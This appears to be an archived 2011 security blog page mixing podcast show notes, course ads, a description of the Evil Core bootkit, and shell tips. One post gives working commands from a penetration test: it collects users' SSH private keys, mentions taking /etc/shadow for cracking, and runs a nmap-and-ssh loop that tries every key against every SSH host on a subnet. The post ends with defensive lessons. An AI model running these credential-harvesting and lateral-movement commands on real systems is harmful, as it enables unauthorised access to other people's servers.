If you haven't done so already, you need to check out Evil Core. Evil Core is an interesting evolution in bootkit malware. Existing bootkits such as Kon-boot and Stoned Vienna modify the Operating System during the boot process by hooking the BIOS interrupt responsible for reading the OS Kernel from the disk. The kernel is modified as it is loaded into memory and the attacker's new evil kernel runs.

Evil Core takes a different approach. First, Evil Core disables Symmetric Multi Processing limiting the number of processor cores available to the Operating System. Then, as the Operating system is booting up on the available processor core, it modifies the boot parameters telling the operating system that less memory is available than there actually is. Then, Evil core puts it's code at what the OS thinks is the end of physical memory where it can live in peace without any fear of the OS modifying it or even seeing that it exists. Last, Evil core runs its code sitting on top of physical memory on the unused processor core. This gives the attacker a tremendous amount of flexibility. The malware has full access to all of user and kernel memory space. It is in Ring Zero and it is invisible to the OS! As far as the OS is concerned it may as well be running on a different computer.

In the demonstration given by Evil Core authors Wolfgang Ettlinger and Stefan Vienbock, they demonstrated just how powerful that level of access can be. Evil Core demonstrates that they can grab the password for a TrueCrypt encrypted volume password out of memory. Like Kon-boot, they can remove the password requirement from the login process. They can hijack the sticky key accessibility functions to implement their own custom code such as a command prompt with SYSTEM privileges. The research is very interesting and I look forward to seeing more as details emerge on this project.

Read more about the project here.

EvilCore Bootkit - pwning multiprocessor systems - demo from Stefan Viehboeck on Vimeo.

Join me for SANS 560 Network Penetration Testing and Ethical Hacking vLIve! Class begins September 12, 2011. For a limited time attendees will receive an IPAD2! Register today for a FREE IPAD2!!

Mark Baggett

Whether you're a lover of the must-have suite of Windows tools from Sysinternals, a Windows Azure enthusiast, or a fan of his high tech novel Zero Day, you'll want to tune in Friday night for our interview of the one and only Mark Russinovich!

If you've read his great technical books or appreciated his efforts to combat malware you'll want to view the show live as it was meant to be enjoyed, via the link below:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 256 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

Live from the PaulDotCom out door studios, Paul, Darren, Ian, and Carlos are joined by "Thor", Martin Mckeay, and Josh Corman! What a line-up! We talk passwords, PCI, things most people do wrong when it comes to security, and more!

Episode 255 Show Notes

Episode 255 Part 2 Direct Audio Download

Episode Hosts:

Paul Asadoorian

Carlos Perez

"Intern Ian"

Jack Daniel

Special Guest #1: Martin Mckeay (Network Security Podcast)

Special Guest #2: Josh Corman (From the world of "awesomesauce")

Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.

In Part 1 we interview Timothy "Thor" Mullen. As Johnny Long says: "Most recognize Thor as the Norse god of thunder with massive powers of destruction. Few realize that he was also the god of restoration. Likewise, his namesake, Timothy "Thor" Mullen, has spent his entire adult life both destroying and restoring Microsoft-based security systems. Thor's Microsoft Security Bible conveys the wisdom and expertise of the industry legend that has defined the bleeding edge of Microsoft security for over twenty years. I highly recommend this book."

Episode 255 Show Notes

Episode 255 Part 1 Direct Audio Download

Episode Hosts:

Paul Asadoorian

Carlos Perez

"Intern Ian"

Jack Daniel

Special Guest #1: Martin Mckeay (Network Security Podcast)

Special Guest #2: Josh Corman (From the world of "awesomesauce")

Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.

Don't miss this lineup for Episode 255! We'll have Dr. Timothy "Thor" Mullen on to discuss the recently released Thor's Microsoft Security Bible: A Collection of Practical Security Techniques. Be sure to watch the show live as Tim will be giving away copies of his book!

For Episode 255 we will also have some special guests in-studio: Martin McKeay from the Network Security Podcast and Josh "Zombie Killer" Corman of Rugged Software.

Be sure to watch the show live for your chance to win a copy of the book:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 255 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

Everyone loves Burp Suite. It's the interception proxy of choice for the majority of web app pentesters, and with built-in tools such as Intruder and Repeater, it's a must-have weapon in any web app hacker's arsenal. One of the only weak points in Burp is its inability to thoroughly brute force unlinked web content. Don't get me wrong, Burp Intruder can brute force unknown directories and files, but it doesn't have the ability to recursively brute force and scrape newly discovered content at runtime.

DirBuster, a popular OWASP project, is a long standing and suitable replacement for this lack of functionality in Burp. DirBuster was designed solely for the discovery of unlinked web content and has the ability to recursively brute force directories and file names at runtime and crawl newly found links as they are discovered. It is threaded, which allows for speed/reliability tuning, and written in Java, so it is pretty much platform independent. It comes prepackaged with some decent word lists, but they haven't been updated for about 3 years. However, there are plenty of resources for quality word lists, so this is no big deal. The newly released RAFT project has a few lists which I highly recommend. The downside to DirBuster is a less than user friendly scan report, which is not conducive to importing results into other tools.

Seeing as DirBuster is my brute forcer of choice, and Burp is my interception proxy of choice, bridging the gap between these 2 tools and getting the output from DirBuster into Burp for further analysis is crucial. As you can see below, one bash command, about 140 characters long, does the trick. It takes the report file from DirBuster and plays it back against your interception proxy. In my case, Burp.

cat report.txt | grep '^\/' | grep -v ':' | while read line; do curl -s http://[target of scan]$line --proxy 127.0.0.1:8080 -o /dev/null; done

Here's a breakdown of the command:
1. pass the report file to stdout
2. grep out all of the directory, file, and internal error results
3. un-grep all of the internal errors
4. loop through all of the results
5. use curl to craft web requests to each iteration of the results
6. configure curl to use a proxy
7. dump the curl output to /dev/null to suppress stdout (optional)

All of your DirBuster results are now available for analysis in your interception proxy and tools like Burp will have passively scanned and spidered the results in the process. There's nothing like some command line kung fu goodness to solve a common problem with such simplicity and elegance. Enjoy!

Look for my SANS 560 Mentor sessions coming to Northwestern Ohio beginning November 2011! In the mean time, join Mark Baggett for SANS 560 Network Penetration Testing and Ethical Hacking vLIve! Class begins September 12, 2011. For a limited time attendees will receive an IPAD2! Register today for a FREE IPAD2!!

In Part 2 of this episode we hear from more the fine folks of Trustwave's Spider labs and are amazed by:

Traps of Gold with Andrew Wilson:

Then we attempt to do the drunken stories of the week and reveal the special "adult" guests to our booth at Defcon:

Episode 254 Show Notes

Episode 254 Part 2 Direct Audio Download

Episode Hosts:

Paul Asadoorian

Carlos Perez

Larry Pesce

John Strand

"Intern Ian"

Jack Daniel

Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.

In this episode we hear from the fine folks of Trustwave's Spider labs. They appear on the show to give three, that's right, three special technical segments on various topics. In part 1 we are astounded by:

Amazingly True Stories from Real Penetration Tests:

We also hear from our good friend Dan Crowley on cryptographic Oracles:

Episode 254 Show Notes

Episode 254 Part 1 Direct Audio Download

Episode Hosts:

Paul Asadoorian

Carlos Perez

Larry Pesce

John Strand

"Intern Ian"

Jack Daniel

Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.

Sometimes people dismiss privilege escalation exploits and don't give them the same priority as remote exploits.  Certain software companies won't even classify privilege escalation as "HIGH PRIORITY".    I wanted to share a story about how a single privilege exploit can result in the downfall of the entire network.   Doug Burks and recently I teamed up on a penetration test and a little bash foo turned a single privilege escalation exploit into root on the entire infrastructure.

Our penetration test started with one vulnerability in a web application.   Throw in a privilege escalation exploit and we had root access on a box.  We grabbed /etc/shadow and gave it to John the Ripper.   It just spun for a few hours with no immediate results.   There were no easily cracked passwords.  But we've got root and can pivot so we decide to moved on to another target.   Looking around we found we had target rich DMZ environment.   There are MANY targets and they are ALL in scope.   A vulnerability scan revealed that they were well patched against remote exploitation.   The method we used to get a foothold wasn't going to get us on any of the other hosts in the DMZ.   If the passwords aren't cracking how do we get in?  Hmm....  I wonder if anyone left SSH private keys lying around.

$ find /home -name "id_?sa"

/home/user1/.ssh/id_dsa

/home/user2/.ssh/id_rsa

/home/user3/.ssh/id_dsa

...

Awesome!! We found 10 users' SSH private keys lying around.   As long as the key isn't password protected we can use it to log into any SSH server where they corresponding public key has been setup.  Now the only problem is knowing which servers are setup to accept which keys. 

First let's look at how to check a single host to see which private keys work.   We start with the output of our "FIND" command above and for each private key we find we will try to login to a specific server.   To log in to the SSH server with a specific key we can use the following syntax:

ssh -q -o "BatchMode=yes" USERNAME@TargetIP -i /home/username/id_dsa

Here is what the parameters mean:

-q                    - Quiet mode so we don't get error messages

-o "BatchMode=yes"    - Puts SSH into "Batchmode".  As a result prompt such as "Do you want to add the SSH Key to the keystore" and password prompts are disabled.   The options seems like it was created for SSH key bruteforcing attacks such as this. 

-i                    - the path to the private key to use to login

USERNAME@TargetIP  - The username to use to login and the IP of the Target Host

We can get the associated USERNAME from the path of the private key.  It is the subdirectory beneath the /home directory.   So let's wrap it in a script that tries each of the keys against a specific host:

find / -name "id_?sa" | while read FILE; do USERNAME=`echo $FILE |cut -d\/ -f3`; ssh -q -o "BatchMode=yes" $USERNAME@x.x.x.x -i $FILE "echo 2>&1" && echo "I can login as $USERNAME"

So now if we replace x.x.x.x with a specific IP address we get a nice list of which keys are allowed to log into the target server.  Now lets wrap that in a loop to try it against ALL the hosts on the network running SSH.  So Doug parse out some NMAP results to grab the IP addresses of hosts running SSH.  The following command grabs just the IP addresses of SSH servers on the subnet:

nmap -n -p22 --open x.y.z.0/24 |grep "Nmap scan report" |awk'{print $5}' 

So putting the two together we get this:

nmap -n -p22 --open x.y.z.0/24 |grep "Nmap scan report" |awk'{print $5}' | while read IP; do find / -name "id_?sa" |while read FILE; do USERNAME=`echo $FILE |cut -d\/ -f3`; echo "Trying $USERNAME@$IP"; ssh -q -o "BatchMode=yes" $USERNAME@$IP -i $FILE "echo 2>&1" && echo "I can login as $USERNAME on $IP" ; done ; done

It gave us something like this truncated output:

Trying user1@x.y.z.8

Trying user2@x.y.z.8

Trying user1@x.y.z.14

Trying user2@x.y.z.14

....

I can login as user8 on x.y.z.31

Trying user1@x.y.z.37

We quickly scanned the whole subnet and found several hosts that we could log in to.   Our unpatched privilege exploit turned those simple logins into root access on all those hosts.   Root access on those boxes revealed a whole new list of SSH keys to try.   The first box we popped gave us 10 keys.  Those 10 keys gave us 13 new hosts.   Each of those 13 had a new set of keys and a new set of servers.   EXPONENTIAL ROOT EXPLOITATION!!!  In no time we had root access to a large portion of servers in the DMZ of the target environment.   From there it was trivial to find ONE host that could be used to pivot to the internal network.

Lessons Learned?  

1)  Protect your SSH keys.  Unless the key is being used by an automated service that is incapable of handling keys with password then put a password on your SSH key!  

2)  There was a patch available for the vulnerability in the web server.   The customer had a 30 day patch cycle on servers in the DMZ.    A 30 day patch cycle may be ok for your internal network.   Your DMZ's need to be better.  Sometime 30 days isn't fast enough.

3)  Make administrators initiate connections from the internal network to each host in the DMZ.   Don't allow them to SSH between hosts in the DMZ.  Unless you have automated services on two servers in the DMZ that need to communicate over SSH DMZ servers shouldn't even see SSH on their peers.  

4) Don't put compilers and debuggers or any unnecessary software on your production boxes.   We needed that compiler for our privilege escalation attacks.  Compile your packages on your development and QA servers and copy them to production.   When you minimize the software on the server you minimize the attack surface and make the attackers job more difficult.

Join me for SANS 560 Network Penetration Testing and Ethical Hacking vLIve! Class begins September 12, 2011. For a limited time attendees will receive an IPAD2!  Register today for a FREE IPAD2!! 

Here we have a post from Doug Burks (yes, the guy from Security Onion)

How do I find evil on my network?

Sometimes... It is obvious..

For the purposes of this example, "evil" could be any text string that
would indicate an attack or successful compromise. If you already
have an IDS deployed on your network, this is a simple matter of
writing an IDS rule to look for "evil". But what if you don't already
have an IDS?

Almost every operating system has some form of tcpdump available, so
here's one option:

tcpdump -nnAi eth1 -s0 | grep "evil"

What does it all mean?

-nn

This option disables name resolution for IP addresses AND port numbers. Some versions of tcpdump do this with a single "n", but the double "nn" option should work on all of them.

A

This option prints just the ASCII text (no hex) in the packets. This is useful when looking for strings like "evil".

i

This option allows you to specify the Interface (in this case eth1). eth1 on my Security Onion box at home is connected to a SPAN port that monitors all ingress/egress of my home network. Doesn't everybody do full packet capture at home?

-s0

This option sets the snaplen. Modern versions of tcpdump default to a snaplen of 65535 bytes. However, many people are still using older versions of tcpdump that default to a snaplen of 68 bytes and would therefore not see the entire packet. Setting snaplen to 0 forces tcpdump to capture the entire packet regardless of its size.

grep

Since we had tcpdump output in ASCII, we can easily use the standard grep command to look for interesting text strings. We might want to include some context around the "evil", so we might want to do something like:

grep -C10 "evil"

This will include the 10 lines before "evil" and the 10 lines after.

Another option would be ngrep. Most Linux distros do not have ngrep
installed by default. But let's assume that you've installed it on
your Linux box or you have a distro such as Security Onion which just
so happens to include ngrep by default. Here's the ngrep version of
the command:

ngrep -d eth1 -s0 "evil"

Here we use the "-d eth1" option to force ngrep to listen on device
eth1 and the "-s0" option to force ngrep to look at the entire packet.
ngrep defaults to a snaplen of 65536, so this option isn't strictly
needed here, but is included for completeness. After specifying these
options, we simply tell ngrep what string to look for.

If you'd like to learn more about packet analysis, tcpdump, Snort, and
Intrusion Detection in general, Doug Burks is teaching SANS SEC503 in
Portland 8/22 - 8/27. We're extending a 10% discount to PaulDotCom
listeners. For more information, please click here.

Whether you weren't able to make DefCon or BlackHat or you simply want to relive a little of the mayhem, join us tomorrow night for three spectacular guest technical segments from the one hundred and sixty legged, international-roaming net-crawling hybrid bug hunter, Trustwave SpiderLabs!

Episode 254 will feature:
- Amazingly True Stories of Real Penetration Tests with Rob Havelt & Wendel Henrique
- Traps of Gold by Andrew Wilson & Michael Brooks
- Speaking with Cryptographic Oracles by Dan Crowley

Don't miss this little taste of Vegas as it was meant to be enjoyed, live, via the link below:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 254 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand and Mike Perez.

Blackhat 2011

1. Pill bottle caps can have wireless connections - This is a really neat usage of technology, people who may forget to take their meds can be reminded with visual indications, and doctors can be notified everytime you take a pill. However, this obviously brings up grave privacy concerns.

We Love Adobe.
2. I have too many t-shirts - But that doesn't stop me from aquiring more.


3. FOTA (Firmware Over The Air) allows you to update firmware over wireless, so you know, that wireless chip in the cows in the field gets updates. Why don't Linksys routers have this!


4. If you think putting a GPS with a gsm chip in it in your kids backpack is a good idea, think again. (Zoomback)


5. The Core party rules - Until someone throws sushi at you, I won't name any names (Shack), but thats a waste of good sushi man! (Good thing I had a towel on me to clean it off)


6. Femtocell hacking is neat, allows you to "middle" calls and make people's phone call 1-900 numbers in one neat small package.


7. Vendors will to to great lengths to get attention - I saw zombies, cigar rollers, motorcycles, and very scantaly clad ladies.


8. There are good uses for aerial UAV's, like incident response. However, they can be used for evil, but you need some flying skills.

9. The topless pool's privacy is invaded often.


10. Battery firmware is fun to play around with, and its creepy when your battery dies in a talk about battery firmware hacking.

Defcon 19

1. Don't use the hotel network, ATM machine, elevators, credit card network, fire suppression, kiosks, or basically anything else with a chip in it, they will all be hacked. I might consider a pre-paid credit card next year for Defcon (no my credit card was not stolen, but got me thinking).
2. When joining the I-Hacked guys to every Defcon party in one night, wear comfortable shoes and have your "drinking big boy pants" on.
3. Bring a sweatshirt to wear at the vendor area.
4. No one likes pink hats, not even women.
5. You an never pack too many socks, however wearing funky socks is really fun.

6. Trustwave Spiderlabs and IOActive throw awesome parties and the bathroom can be the place to be!


7. Twitchy lives.

Images have been obscured to protect the innocent (and the guilty).
8. Simple Nomad looks great in pink.

9. We love listeners that give us gifts and return the favor.

10. Larry loves getting his yearly mowhawk, and only when we are together are we "1337".

Top Ten Reasons You Know You've Been In Vegas Too Long

1. Nosebleeds.
2. You don't even hear the "slot machine noise" anymore (ding, ling, la ling, ding ding)
3. Vegas Throat - Its a scratchy, irritating, dry, "I've been breathing too much vegas" kind of feeling that is often accompanied by pain and loss of voice.
4. When you get home and pay $20 for lunch, you think, "Wow, thats such a bargain!"
5. Walking 5 miles to the store when you get home is a short trip
6. You walk outside when its 107F and say, "Its not that hot"
7. You start to wonder if the older nice lady serving you breakfast was once the gogo dancer at the club 30 years ago
8. The big topic of conversation over dinner is whether or not the dancers at the shadow bar are really naked
9. You are worried that your wife will notice that $300 withdrawal from the ATM at 1AM, and the other for $200 at 3AM
10. You think its totally normal for women to be dressed in gstrings

Paul, Larry, Jack, and Nick Selby talk about the stories for the week! Including hacking cars, mod_security challenge results, router pwn web sites, drug smuggling.

Episode 253 Show Notes

Episode 253 Part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Jack Daniel,Larry Pesce

Audio Feeds: